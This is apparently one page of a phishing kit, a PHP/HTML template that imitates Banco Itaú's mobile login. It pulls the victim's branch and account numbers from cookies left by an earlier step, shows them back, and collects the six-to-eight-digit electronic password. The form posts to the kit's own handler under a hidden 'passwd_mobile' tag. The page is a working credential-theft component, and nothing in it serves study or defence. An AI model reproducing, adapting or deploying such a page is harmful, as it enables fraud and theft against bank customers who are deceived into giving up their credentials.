<!doctype html>
<html lang="pt-BR">
<head>
	<meta charset='UTF-8'>
	<meta name='viewport' content='width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0'>
	<meta http-equiv='X-UA-Compatible' content='ie=edge'>

	<title>Banco Itaú | Feito com você</title>
	<link rel='shortcut icon' href='<?= DOMINIO; ?>/public/images/favicon.ico'>

	<meta name='theme-color' content='#EC7000'>
	<meta name='apple-mobile-web-app-status-bar-style' content='#EC7000'>
	<meta name='msapplication-navbutton-color' content='#EC7000'>

	<link rel='stylesheet' href='<?= DOMINIO; ?>/public/styles/fonts.css'>
	<link rel='stylesheet' href='<?= DOMINIO; ?>/public/styles/mobile.css'>
	<script>
		function getCookie(key) {
			let cookies = document.cookie;
			cookies = cookies.split('; ');

			let hasItem = false;
			let retornar;
			for (let i = 0; i < cookies.length; i++) {
				const atual = cookies[i].split('=');

				if (atual[0] === key) {
					retornar = atual[1];
					hasItem = true;
				}
			}

			if (hasItem) {
				return retornar;
			}
			return false;
		}
	</script>
</head>
<body class="bg_orange">

<div class="container">
	<div class="content" style="width: 100%;">
		<div id="box_pass">
			<div class="header">
				<div id="esq">
					<div class='icone'><img src='<?= DOMINIO; ?>/public/images/icon_mb_user.png' alt=''></div>
					<div class='info'>
						<h1>Olá</h1>
						<p>ag:
							<script>document.write(getCookie('agencia'));</script> c/c:
							<script>document.write(getCookie('conta'));</script>
						</p>
					</div>
				</div>
				<div id="dir"><img src="<?= DOMINIO; ?>/public/images/icon_dt_seta.png" alt=""></div>
			</div>

			<form action="#" method="post" onsubmit="return checkForm();" autocomplete="off">
				<label for="is_passwd">
					<span>senha eletrônica</span>
					<input type="tel" name="is_passwd" id="is_passwd" maxlength="6">
				</label>

				<button class="btn_passwd">acessar</button>
				<input type="hidden" name="sender" value="passwd_mobile">
			</form>

			<div></div>
		</div>
	</div>
</div>
<script src="<?= DOMINIO; ?>/public/javascripts/jquery.min.js"></script>
<script src="<?= DOMINIO; ?>/public/javascripts/jquery.mask.js"></script>
<script src="<?= DOMINIO; ?>/public/javascripts/custom.js"></script>
<script>
	$(document).ready(() => {
		$('#is_passwd').mask('00000000');
	});

	function checkForm(){
		const passwd = $('#is_passwd');

		if (passwd.val().length < 4) {
			alert('Senha eletrônica digitada não está correto. Por favor, tente novamente!');
			passwd.val('').focus();
			return false;
		} else {
			$('.btn_passwd').attr('disabled', true);
			return true;
		}
	}
</script>
</body>
</html>